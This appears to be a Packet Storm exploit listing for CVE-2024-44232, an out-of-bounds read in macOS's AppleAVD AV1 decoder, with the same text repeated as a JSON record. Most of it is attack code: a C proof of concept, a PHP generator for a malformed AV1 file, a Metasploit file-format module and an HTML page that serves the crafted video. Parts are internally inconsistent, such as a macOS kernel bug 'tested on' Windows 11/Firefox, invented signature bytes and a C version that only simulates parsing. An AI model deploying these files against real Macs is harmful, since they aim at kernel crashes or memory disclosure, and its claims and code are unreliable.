📄 macOS Sonoma 14.5 Denial of Service_PACKETSTORM:212319

6.5 / 10

MEDIUM

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Description

macOS Sonoma version 14.5 has a vulnerability in the AV1Syntax::ParseHeader function that can allow for a kernel crash...

Visit Original Source

Basic Information

ID PACKETSTORM:212319

Published Dec 2, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : macOS Sonoma 14.5 potential kernel crash |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : System built‑in component. No standalone download available. |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/202851/ & CVE-2024-44232

[+] Summary :

The vulnerability resides in the AV1_Syntax::Parse_Header function, where the size of AV1 OBUs (Open Bitstream Units) is parsed incorrectly.
Due to insufficient validation of OBU sizes, a specially crafted AV1 video file can cause the parser to compute an excessively large size value. When this malformed size is later used during parsing, it can trigger an Out-of-Bounds Read.
This flaw is tracked as CVE-2024-44232, a critical out-of-bounds read vulnerability in Apple’s hardware-accelerated AppleAVD AV1 decoding kernel extension.
The issue affects macOS systems equipped with hardware AV1 decoder support.

[+] Discovered by Google Project Zero, the vulnerability may lead to:

Kernel memory disclosure, or Kernel crashes (DoS)
simply by processing a malicious AV1 video file.

[+] POC :

for php : php poc.php

Makefile for C PoC
makefile

# Makefile for CVE-2024-44232 PoC
CC = gcc
CFLAGS = -Wall -Wextra -std=c99
TARGET = av1_poc
SRC = av1_poc.c

all: $(TARGET)

$(TARGET): $(SRC)
$(CC) $(CFLAGS) -o $(TARGET) $(SRC)

clean:
rm -f $(TARGET) *.av1

test: $(TARGET)
./$(TARGET)

.PHONY: all clean test

🔧 Compilation and Usage
For C Version:
bash

gcc -Wall -o av1_poc av1_poc.c
./av1_poc

************************
C Language PoC :
************************

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

// Basic OBU structure
typedef struct {
uint8_t type;
uint8_t extension_flag;
uint8_t has_size;
uint64_t size;
} obu_header_t;

// Create malformed AV1 with oversized OBU
void create_malformed_av1(uint8_t **buffer, size_t *size) {
// AV1 basic signature
uint8_t av1_signature[] = {0x81, 0x00, 0x00, 0x00};

// OBU with extremely large size
obu_header_t obu;
obu.type = 0x0F; // Unknown/Padding type (triggers vulnerable path)
obu.extension_flag = 0x00;
obu.has_size = 0x01;
obu.size = 0xFFFFFFFFFFFFFFFF; // Maximum size

// Calculate total size
size_t header_size = sizeof(av1_signature);
size_t obu_size = 4 + 8; // OBU header + encoded OBU size
*size = header_size + obu_size;

// Allocate memory
*buffer = (uint8_t*)malloc(*size);
if (!*buffer) {
printf("Memory allocation failed\n");
return;
}

// Copy signature
memcpy(*buffer, av1_signature, sizeof(av1_signature));

// Build OBU header
uint8_t *ptr = *buffer + header_size;

// Type and extension field
*ptr++ = (obu.type << 3) | (obu.extension_flag << 2) | (obu.has_size << 1);

// Encoded OBU size (LEB128) - very large size
uint8_t leb128[] = {
0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF, 0xFF, 0x7F // Stop byte
};
memcpy(ptr, leb128, sizeof(leb128));
ptr += sizeof(leb128);

printf("Malformed AV1 file created:\n");
printf("- Total size: %zu bytes\n", *size);
printf("- OBU type: 0x%02X (Unknown)\n", obu.type);
printf("- OBU size: %llu (extremely large)\n", obu.size);
}

// Simulate vulnerable OBU parsing
void simulate_obu_parsing(const uint8_t *data, size_t data_size) {
printf("\nSimulating OBU parsing...\n");

const uint8_t *ptr = data + 4; // Skip AV1 signature
const uint8_t *end = data + data_size;

if (ptr >= end) {
printf("Insufficient data\n");
return;
}

// Read OBU header
uint8_t obu_header = *ptr++;
uint8_t obu_type = (obu_header >> 3) & 0x1F;
uint8_t extension_flag = (obu_header >> 2) & 0x1;
uint8_t has_size = (obu_header >> 1) & 0x1;

printf("OBU Header:\n");
printf("- Type: 0x%02X\n", obu_type);
printf("- Extension flag: %d\n", extension_flag);
printf("- Has size: %d\n", has_size);

if (!has_size) {
printf("No OBU size field\n");
return;
}

// Simulate reading OBU size (vulnerable code)
uint64_t obu_size = 0;
int shift = 0;
int bytes_read = 0;
int max_bytes = 8;

printf("Reading OBU size (LEB128):\n");

while (bytes_read < max_bytes) {
if (ptr >= end) {
printf("End of data while reading size\n");
break;
}

uint8_t byte = *ptr++;
bytes_read++;

obu_size |= (uint64_t)(byte & 0x7F) << shift;
printf(" Byte %d: 0x%02X, Current size: %llu\n",
bytes_read, byte, obu_size);

if ((byte & 0x80) == 0) {
break;
}

shift += 7;
if (bytes_read == max_bytes) {
printf(" Reached max bytes\n");
break;
}
}

printf("Final OBU size: %llu\n", obu_size);
printf("Remaining buffer bytes: %ld\n", end - ptr);

// Simulate the vulnerable out-of-bounds read
if (obu_type == 0x0F) { // Unknown/Padding type
printf("\nTriggering unknown OBU path...\n");

// This simulates the vulnerable code:
// while ( v31 + v83 )
// {
// if ( v8[v36 - 1 + v31 + v37 + v22 + v83--] )

size_t remaining_data = end - ptr;
if (obu_size > remaining_data) {
printf("❗ POTENTIAL OUT-OF-BOUNDS READ!\n");
printf("❗ OBU requests %llu bytes but only %zu bytes available\n",
obu_size, remaining_data);
printf("❗ Difference: %lld bytes beyond bounds\n",
obu_size - remaining_data);
} else {
printf("Sufficient data for OBU\n");
}
}
}

// Main test cycle
int main() {
printf("=== CVE-2024-44232 PoC - AppleAVD OOB Read ===\n");
printf("Out-of-bounds read in AV1 decoding\n\n");

uint8_t *malformed_av1 = NULL;
size_t file_size = 0;

// Create malformed AV1 file
create_malformed_av1(&malformed_av1, &file_size);

if (malformed_av1) {
// Simulate vulnerable processing
simulate_obu_parsing(malformed_av1, file_size);

// Cleanup
free(malformed_av1);
}

printf("\n=== Test completed ===\n");
return 0;
}

-********************
PHP PoC
-**/*/*/*/*/*/*/*/*/*/

<?php
/**
* CVE-2024-44232 PoC - AppleAVD Out-of-Bounds Read
* PHP malformed AV1 file generator
* by indoushka
*/

class AV1MalformedGenerator {

private $debug = true;

public function log($message) {
if ($this->debug) {
echo "[INFO] " . $message . "\n";
}
}

public function generateMalformedAV1() {
$this->log("Generating malformed AV1 file for CVE-2024-44232");

// AV1 signature
$av1_signature = "\x81\x00\x00\x00";

// Create OBU with huge size
$obu_header = $this->createObuHeader(0x0F, false, true); // Unknown type

// Create oversized LEB128
$leb128_size = $this->createLargeLeb128(0x7FFFFFFFFFFFFFFF);

// Build the data
$malformed_data = $av1_signature . $obu_header . $leb128_size;

$this->log("Malformed data generated:");
$this->log(" - Total size: " . strlen($malformed_data) . " bytes");
$this->log(" - OBU type: 0x0F (Unknown)");
$this->log(" - OBU size: extremely large");

return $malformed_data;
}

private function createObuHeader($type, $extension_flag, $has_size) {
$header = ($type << 3) | ($extension_flag << 2) | ($has_size << 1);
return chr($header);
}

private function createLargeLeb128($size) {
$leb128 = "";
$value = $size;

do {
$byte = $value & 0x7F;
$value >>= 7;

if ($value != 0) {
$byte |= 0x80;
}

$leb128 .= chr($byte);
} while ($value != 0);

// Add extra bytes to make size huge
while (strlen($leb128) < 10) {
$leb128 .= chr(0xFF);
}
$leb128 .= chr(0x7F); // Stop byte

$this->log("Created LEB128 size: " . strlen($leb128) . " bytes");

return $leb128;
}

public function saveToFile($filename = "malformed.av1") {
$data = $this->generateMalformedAV1();

if (file_put_contents($filename, $data)) {
$this->log("File saved as: " . $filename);
$this->analyzeFile($filename);
return true;
} else {
$this->log("Failed to save file");
return false;
}
}

private function analyzeFile($filename) {
$data = file_get_contents($filename);
$this->log("\nFile analysis:");
$this->log("Size: " . strlen($data) . " bytes");
$this->log("First bytes: " . bin2hex(substr($data, 0, 16)));

// Simulate vulnerable parsing
$this->simulateVulnerableParsing($data);
}

private function simulateVulnerableParsing($data) {
$this->log("\nSimulating vulnerable parsing:");

if (strlen($data) < 5) {
$this->log("Insufficient data");
return;
}

$ptr = 4; // Skip signature
$obu_header = ord($data[$ptr++]);

$type = ($obu_header >> 3) & 0x1F;
$has_size = ($obu_header >> 1) & 0x1;

$this->log("OBU header: 0x" . dechex($obu_header));
$this->log("Type: 0x" . dechex($type));
$this->log("Has size: " . $has_size);

if ($has_size) {
$obu_size = 0;
$shift = 0;
$bytes_read = 0;

while ($bytes_read < 10 && $ptr < strlen($data)) {
$byte = ord($data[$ptr++]);
$bytes_read++;

$obu_size |= ($byte & 0x7F) << $shift;

if (($byte & 0x80) == 0) {
break;
}

$shift += 7;
}

$this->log("Parsed size: " . $obu_size);
$this->log("Remaining bytes: " . (strlen($data) - $ptr));

if ($obu_size > (strlen($data) - $ptr)) {
$this->log("⚠️ POTENTIAL OUT-OF-BOUNDS READ!");
$this->log("⚠️ Requested: " . $obu_size . " bytes");
$this->log("⚠️ Available: " . (strlen($data) - $ptr) . " bytes");
}
}
}
}

// Usage
if (php_sapi_name() === 'cli') {
$generator = new AV1MalformedGenerator();

if (isset($argv[1])) {
$filename = $argv[1];
} else {
$filename = "cve_2024_44232_poc.av1";
}

$generator->saveToFile($filename);

echo "\n=== Test file generated ===\n";
echo "Use this file to test the vulnerability on macOS systems\n";
echo "with AppleAVD extension and hardware AV1 decoder support\n";
}
?>

***********************
Metasploit Module
***********************
##
# Metasploit module for CVE-2024-44232
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'AppleAVD AV1 OBU Out-of-Bounds Read',
'Description' => %q{
This module generates a malformed AV1 file that triggers
an out-of-bounds read in AppleAVD kernel extension.
CVE-2024-44232.
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-44232'],
['URL', 'https://googleprojectzero.blogspot.com/']
],
'DisclosureDate' => '2024-07-24'
))

register_options([
OptString.new('FILENAME', [true, 'The output filename', 'malformed.av1'])
])
end

def run
# AV1 signature
av1_signature = "\x81\x00\x00\x00"

# OBU header with unknown type
obu_header = create_obu_header(0x0F, false, true)

# Large LEB128 size
leb128_size = create_large_leb128(0x7FFFFFFFFFFFFFFF)

# Build the file
malformed_data = av1_signature + obu_header + leb128_size

print_status("Creating malformed AV1 file...")
print_status("Total size: #{malformed_data.length} bytes")
print_status("OBU type: 0x0F (Unknown)")
print_status("Large OBU size to trigger OOB read")

file_create(malformed_data)
print_good("Malformed AV1 file created: #{datastore['FILENAME']}")
end

def create_obu_header(type, extension_flag, has_size)
header = (type << 3) | (extension_flag ? 1 << 2 : 0) | (has_size ? 1 << 1 : 0)
[header].pack('C')
end

def create_large_leb128(size)
leb128 = ""
value = size

begin
byte = value & 0x7F
value >>= 7

if value != 0
byte |= 0x80
end

leb128 << [byte].pack('C')
end while value != 0

# Make the size larger
while leb128.length < 10
leb128 << "\xFF"
end
leb128 << "\x7F"

leb128
end
end

**************************
HTML Test Page
////////*****************
<!DOCTYPE html>
<html>
<head>
<title>CVE-2024-44232 Test</title>
</head>
<body>
<h1>indoushka-AppleAVD Vulnerability Test Page</h1>

<video id="testVideo" width="320" height="240" controls>
<source src="malformed.av1" type="video/av1">
Browser does not support AV1.
</video>

<script>
// Try to load the malformed video
const video = document.getElementById('testVideo');

video.addEventListener('error', function(e) {
console.log('Video loading error:', e);
document.getElementById('status').innerHTML =
'Error detected - vulnerability may have been triggered';
});

video.addEventListener('load', function(e) {
document.getElementById('status').innerHTML =
'Video loaded successfully';
});
</script>

<div id="status">Preparing...</div>
<div id="info">
<p>This is a test for CVE-2024-44232 in AppleAVD</p>
<p>On macOS systems with hardware AV1 decoder support</p>
</div>
</body>
</html>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-02T19:41:26",
    "description": "macOS Sonoma version 14.5 has a vulnerability in the AV1Syntax::ParseHeader function that can allow for a kernel crash...",
    "published": "2025-12-02T00:00:00",
    "modified": "2025-12-02T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 macOS Sonoma 14.5 Denial of Service",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212319",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2024-44232"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : macOS Sonoma 14.5 potential kernel crash                                                                                    |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : System built\u2011in component. No standalone download available.                                                                |\n    =============================================================================================================================================\n    \n    [+] References : https://packetstorm.news/files/id/202851/ &  CVE-2024-44232\n    \n    [+] Summary : \n    \n                 The vulnerability resides in the AV1_Syntax::Parse_Header function, where the size of AV1 OBUs (Open Bitstream Units) is parsed incorrectly. \n    \t\t\t Due to insufficient validation of OBU sizes, a specially crafted AV1 video file can cause the parser to compute an excessively large size value. When this malformed size is later used during parsing, it can trigger an Out-of-Bounds Read.\n                 This flaw is tracked as CVE-2024-44232, a critical out-of-bounds read vulnerability in Apple\u2019s hardware-accelerated AppleAVD AV1 decoding kernel extension. \n    \t\t\t The issue affects macOS systems equipped with hardware AV1 decoder support.\n    \t\t\t \n    [+] Discovered by Google Project Zero, the vulnerability may lead to:\n    \n        Kernel memory disclosure, or Kernel crashes (DoS)\n        simply by processing a malicious AV1 video file.\n    \n    \n    [+]  POC : \n    \n    for php : php poc.php\n    \n    Makefile for C PoC\n    makefile\n    \n    # Makefile for CVE-2024-44232 PoC\n    CC = gcc\n    CFLAGS = -Wall -Wextra -std=c99\n    TARGET = av1_poc\n    SRC = av1_poc.c\n    \n    all: $(TARGET)\n    \n    $(TARGET): $(SRC)\n    \t$(CC) $(CFLAGS) -o $(TARGET) $(SRC)\n    \n    clean:\n    \trm -f $(TARGET) *.av1\n    \n    test: $(TARGET)\n    \t./$(TARGET)\n    \n    .PHONY: all clean test\n    \n    \ud83d\udd27 Compilation and Usage\n    For C Version:\n    bash\n    \n    gcc -Wall -o av1_poc av1_poc.c\n    ./av1_poc\n    \n    ************************\n    C Language PoC :\n    ************************\n    \n    #include <stdio.h>\n    #include <stdlib.h>\n    #include <string.h>\n    #include <stdint.h>\n    \n    // Basic OBU structure\n    typedef struct {\n        uint8_t type;\n        uint8_t extension_flag;\n        uint8_t has_size;\n        uint64_t size;\n    } obu_header_t;\n    \n    // Create malformed AV1 with oversized OBU\n    void create_malformed_av1(uint8_t **buffer, size_t *size) {\n        // AV1 basic signature\n        uint8_t av1_signature[] = {0x81, 0x00, 0x00, 0x00};\n        \n        // OBU with extremely large size\n        obu_header_t obu;\n        obu.type = 0x0F; // Unknown/Padding type (triggers vulnerable path)\n        obu.extension_flag = 0x00;\n        obu.has_size = 0x01;\n        obu.size = 0xFFFFFFFFFFFFFFFF; // Maximum size\n        \n        // Calculate total size\n        size_t header_size = sizeof(av1_signature);\n        size_t obu_size = 4 + 8; // OBU header + encoded OBU size\n        *size = header_size + obu_size;\n        \n        // Allocate memory\n        *buffer = (uint8_t*)malloc(*size);\n        if (!*buffer) {\n            printf(\"Memory allocation failed\\n\");\n            return;\n        }\n        \n        // Copy signature\n        memcpy(*buffer, av1_signature, sizeof(av1_signature));\n        \n        // Build OBU header\n        uint8_t *ptr = *buffer + header_size;\n        \n        // Type and extension field\n        *ptr++ = (obu.type << 3) | (obu.extension_flag << 2) | (obu.has_size << 1);\n        \n        // Encoded OBU size (LEB128) - very large size\n        uint8_t leb128[] = {\n            0xFF, 0xFF, 0xFF, 0xFF, 0xFF, \n            0xFF, 0xFF, 0xFF, 0xFF, 0x7F  // Stop byte\n        };\n        memcpy(ptr, leb128, sizeof(leb128));\n        ptr += sizeof(leb128);\n        \n        printf(\"Malformed AV1 file created:\\n\");\n        printf(\"- Total size: %zu bytes\\n\", *size);\n        printf(\"- OBU type: 0x%02X (Unknown)\\n\", obu.type);\n        printf(\"- OBU size: %llu (extremely large)\\n\", obu.size);\n    }\n    \n    // Simulate vulnerable OBU parsing\n    void simulate_obu_parsing(const uint8_t *data, size_t data_size) {\n        printf(\"\\nSimulating OBU parsing...\\n\");\n        \n        const uint8_t *ptr = data + 4; // Skip AV1 signature\n        const uint8_t *end = data + data_size;\n        \n        if (ptr >= end) {\n            printf(\"Insufficient data\\n\");\n            return;\n        }\n        \n        // Read OBU header\n        uint8_t obu_header = *ptr++;\n        uint8_t obu_type = (obu_header >> 3) & 0x1F;\n        uint8_t extension_flag = (obu_header >> 2) & 0x1;\n        uint8_t has_size = (obu_header >> 1) & 0x1;\n        \n        printf(\"OBU Header:\\n\");\n        printf(\"- Type: 0x%02X\\n\", obu_type);\n        printf(\"- Extension flag: %d\\n\", extension_flag);\n        printf(\"- Has size: %d\\n\", has_size);\n        \n        if (!has_size) {\n            printf(\"No OBU size field\\n\");\n            return;\n        }\n        \n        // Simulate reading OBU size (vulnerable code)\n        uint64_t obu_size = 0;\n        int shift = 0;\n        int bytes_read = 0;\n        int max_bytes = 8;\n        \n        printf(\"Reading OBU size (LEB128):\\n\");\n        \n        while (bytes_read < max_bytes) {\n            if (ptr >= end) {\n                printf(\"End of data while reading size\\n\");\n                break;\n            }\n            \n            uint8_t byte = *ptr++;\n            bytes_read++;\n            \n            obu_size |= (uint64_t)(byte & 0x7F) << shift;\n            printf(\"  Byte %d: 0x%02X, Current size: %llu\\n\", \n                   bytes_read, byte, obu_size);\n            \n            if ((byte & 0x80) == 0) {\n                break;\n            }\n            \n            shift += 7;\n            if (bytes_read == max_bytes) {\n                printf(\"  Reached max bytes\\n\");\n                break;\n            }\n        }\n        \n        printf(\"Final OBU size: %llu\\n\", obu_size);\n        printf(\"Remaining buffer bytes: %ld\\n\", end - ptr);\n        \n        // Simulate the vulnerable out-of-bounds read\n        if (obu_type == 0x0F) { // Unknown/Padding type\n            printf(\"\\nTriggering unknown OBU path...\\n\");\n            \n            // This simulates the vulnerable code:\n            // while ( v31 + v83 )  \n            // {  \n            //   if ( v8[v36 - 1 + v31 + v37 + v22 + v83--] )  \n            \n            size_t remaining_data = end - ptr;\n            if (obu_size > remaining_data) {\n                printf(\"\u2757 POTENTIAL OUT-OF-BOUNDS READ!\\n\");\n                printf(\"\u2757 OBU requests %llu bytes but only %zu bytes available\\n\", \n                       obu_size, remaining_data);\n                printf(\"\u2757 Difference: %lld bytes beyond bounds\\n\", \n                       obu_size - remaining_data);\n            } else {\n                printf(\"Sufficient data for OBU\\n\");\n            }\n        }\n    }\n    \n    // Main test cycle\n    int main() {\n        printf(\"=== CVE-2024-44232 PoC - AppleAVD OOB Read ===\\n\");\n        printf(\"Out-of-bounds read in AV1 decoding\\n\\n\");\n        \n        uint8_t *malformed_av1 = NULL;\n        size_t file_size = 0;\n        \n        // Create malformed AV1 file\n        create_malformed_av1(&malformed_av1, &file_size);\n        \n        if (malformed_av1) {\n            // Simulate vulnerable processing\n            simulate_obu_parsing(malformed_av1, file_size);\n            \n            // Cleanup\n            free(malformed_av1);\n        }\n        \n        printf(\"\\n=== Test completed ===\\n\");\n        return 0;\n    }\n    \n    -********************\n    PHP PoC\n    -**/*/*/*/*/*/*/*/*/*/\n    \n    <?php\n    /**\n     * CVE-2024-44232 PoC - AppleAVD Out-of-Bounds Read\n     * PHP malformed AV1 file generator\n     * by indoushka\n     */\n    \n    class AV1MalformedGenerator {\n        \n        private $debug = true;\n        \n        public function log($message) {\n            if ($this->debug) {\n                echo \"[INFO] \" . $message . \"\\n\";\n            }\n        }\n        \n        public function generateMalformedAV1() {\n            $this->log(\"Generating malformed AV1 file for CVE-2024-44232\");\n            \n            // AV1 signature\n            $av1_signature = \"\\x81\\x00\\x00\\x00\";\n            \n            // Create OBU with huge size\n            $obu_header = $this->createObuHeader(0x0F, false, true); // Unknown type\n            \n            // Create oversized LEB128\n            $leb128_size = $this->createLargeLeb128(0x7FFFFFFFFFFFFFFF);\n            \n            // Build the data\n            $malformed_data = $av1_signature . $obu_header . $leb128_size;\n            \n            $this->log(\"Malformed data generated:\");\n            $this->log(\" - Total size: \" . strlen($malformed_data) . \" bytes\");\n            $this->log(\" - OBU type: 0x0F (Unknown)\");\n            $this->log(\" - OBU size: extremely large\");\n            \n            return $malformed_data;\n        }\n        \n        private function createObuHeader($type, $extension_flag, $has_size) {\n            $header = ($type << 3) | ($extension_flag << 2) | ($has_size << 1);\n            return chr($header);\n        }\n        \n        private function createLargeLeb128($size) {\n            $leb128 = \"\";\n            $value = $size;\n            \n            do {\n                $byte = $value & 0x7F;\n                $value >>= 7;\n                \n                if ($value != 0) {\n                    $byte |= 0x80;\n                }\n                \n                $leb128 .= chr($byte);\n            } while ($value != 0);\n            \n            // Add extra bytes to make size huge\n            while (strlen($leb128) < 10) {\n                $leb128 .= chr(0xFF);\n            }\n            $leb128 .= chr(0x7F); // Stop byte\n            \n            $this->log(\"Created LEB128 size: \" . strlen($leb128) . \" bytes\");\n            \n            return $leb128;\n        }\n        \n        public function saveToFile($filename = \"malformed.av1\") {\n            $data = $this->generateMalformedAV1();\n            \n            if (file_put_contents($filename, $data)) {\n                $this->log(\"File saved as: \" . $filename);\n                $this->analyzeFile($filename);\n                return true;\n            } else {\n                $this->log(\"Failed to save file\");\n                return false;\n            }\n        }\n        \n        private function analyzeFile($filename) {\n            $data = file_get_contents($filename);\n            $this->log(\"\\nFile analysis:\");\n            $this->log(\"Size: \" . strlen($data) . \" bytes\");\n            $this->log(\"First bytes: \" . bin2hex(substr($data, 0, 16)));\n            \n            // Simulate vulnerable parsing\n            $this->simulateVulnerableParsing($data);\n        }\n        \n        private function simulateVulnerableParsing($data) {\n            $this->log(\"\\nSimulating vulnerable parsing:\");\n            \n            if (strlen($data) < 5) {\n                $this->log(\"Insufficient data\");\n                return;\n            }\n            \n            $ptr = 4; // Skip signature\n            $obu_header = ord($data[$ptr++]);\n            \n            $type = ($obu_header >> 3) & 0x1F;\n            $has_size = ($obu_header >> 1) & 0x1;\n            \n            $this->log(\"OBU header: 0x\" . dechex($obu_header));\n            $this->log(\"Type: 0x\" . dechex($type));\n            $this->log(\"Has size: \" . $has_size);\n            \n            if ($has_size) {\n                $obu_size = 0;\n                $shift = 0;\n                $bytes_read = 0;\n                \n                while ($bytes_read < 10 && $ptr < strlen($data)) {\n                    $byte = ord($data[$ptr++]);\n                    $bytes_read++;\n                    \n                    $obu_size |= ($byte & 0x7F) << $shift;\n                    \n                    if (($byte & 0x80) == 0) {\n                        break;\n                    }\n                    \n                    $shift += 7;\n                }\n                \n                $this->log(\"Parsed size: \" . $obu_size);\n                $this->log(\"Remaining bytes: \" . (strlen($data) - $ptr));\n                \n                if ($obu_size > (strlen($data) - $ptr)) {\n                    $this->log(\"\u26a0\ufe0f  POTENTIAL OUT-OF-BOUNDS READ!\");\n                    $this->log(\"\u26a0\ufe0f  Requested: \" . $obu_size . \" bytes\");\n                    $this->log(\"\u26a0\ufe0f  Available: \" . (strlen($data) - $ptr) . \" bytes\");\n                }\n            }\n        }\n    }\n    \n    // Usage\n    if (php_sapi_name() === 'cli') {\n        $generator = new AV1MalformedGenerator();\n        \n        if (isset($argv[1])) {\n            $filename = $argv[1];\n        } else {\n            $filename = \"cve_2024_44232_poc.av1\";\n        }\n        \n        $generator->saveToFile($filename);\n        \n        echo \"\\n=== Test file generated ===\\n\";\n        echo \"Use this file to test the vulnerability on macOS systems\\n\";\n        echo \"with AppleAVD extension and hardware AV1 decoder support\\n\";\n    }\n    ?>\n    \n    ***********************\n    Metasploit Module\n    ***********************\n    ##\n    # Metasploit module for CVE-2024-44232\n    ##\n    \n    require 'msf/core'\n    \n    class MetasploitModule < Msf::Auxiliary\n      \n      include Msf::Exploit::FILEFORMAT\n      \n      def initialize(info = {})\n        super(update_info(info,\n          'Name'           => 'AppleAVD AV1 OBU Out-of-Bounds Read',\n          'Description'    => %q{\n            This module generates a malformed AV1 file that triggers\n            an out-of-bounds read in AppleAVD kernel extension.\n            CVE-2024-44232.\n          },\n          'Author'         => ['indoushka'],\n          'License'        => MSF_LICENSE,\n          'References'     => [\n            ['CVE', '2024-44232'],\n            ['URL', 'https://googleprojectzero.blogspot.com/']\n          ],\n          'DisclosureDate' => '2024-07-24'\n        ))\n        \n        register_options([\n          OptString.new('FILENAME', [true, 'The output filename', 'malformed.av1'])\n        ])\n      end\n      \n      def run\n        # AV1 signature\n        av1_signature = \"\\x81\\x00\\x00\\x00\"\n        \n        # OBU header with unknown type\n        obu_header = create_obu_header(0x0F, false, true)\n        \n        # Large LEB128 size\n        leb128_size = create_large_leb128(0x7FFFFFFFFFFFFFFF)\n        \n        # Build the file\n        malformed_data = av1_signature + obu_header + leb128_size\n        \n        print_status(\"Creating malformed AV1 file...\")\n        print_status(\"Total size: #{malformed_data.length} bytes\")\n        print_status(\"OBU type: 0x0F (Unknown)\")\n        print_status(\"Large OBU size to trigger OOB read\")\n        \n        file_create(malformed_data)\n        print_good(\"Malformed AV1 file created: #{datastore['FILENAME']}\")\n      end\n      \n      def create_obu_header(type, extension_flag, has_size)\n        header = (type << 3) | (extension_flag ? 1 << 2 : 0) | (has_size ? 1 << 1 : 0)\n        [header].pack('C')\n      end\n      \n      def create_large_leb128(size)\n        leb128 = \"\"\n        value = size\n        \n        begin\n          byte = value & 0x7F\n          value >>= 7\n          \n          if value != 0\n            byte |= 0x80\n          end\n          \n          leb128 << [byte].pack('C')\n        end while value != 0\n        \n        # Make the size larger\n        while leb128.length < 10\n          leb128 << \"\\xFF\"\n        end\n        leb128 << \"\\x7F\"\n        \n        leb128\n      end\n    end\n    \n    **************************\n    HTML Test Page\n    ////////*****************\n    <!DOCTYPE html>\n    <html>\n    <head>\n        <title>CVE-2024-44232 Test</title>\n    </head>\n    <body>\n        <h1>indoushka-AppleAVD Vulnerability Test Page</h1>\n        \n        <video id=\"testVideo\" width=\"320\" height=\"240\" controls>\n            <source src=\"malformed.av1\" type=\"video/av1\">\n            Browser does not support AV1.\n        </video>\n        \n        <script>\n            // Try to load the malformed video\n            const video = document.getElementById('testVideo');\n            \n            video.addEventListener('error', function(e) {\n                console.log('Video loading error:', e);\n                document.getElementById('status').innerHTML = \n                    'Error detected - vulnerability may have been triggered';\n            });\n            \n            video.addEventListener('load', function(e) {\n                document.getElementById('status').innerHTML = \n                    'Video loaded successfully';\n            });\n        </script>\n        \n        <div id=\"status\">Preparing...</div>\n        <div id=\"info\">\n            <p>This is a test for CVE-2024-44232 in AppleAVD</p>\n            <p>On macOS systems with hardware AV1 decoder support</p>\n        </div>\n    </body>\n    </html>\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212319",
    "cvss": {
        "score": 6.5,
        "severity": "MEDIUM",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212319/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply